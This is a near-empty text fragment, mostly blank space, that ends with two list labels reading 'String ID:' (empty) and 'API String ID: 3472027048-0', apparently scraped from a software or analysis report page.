                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3472027048-0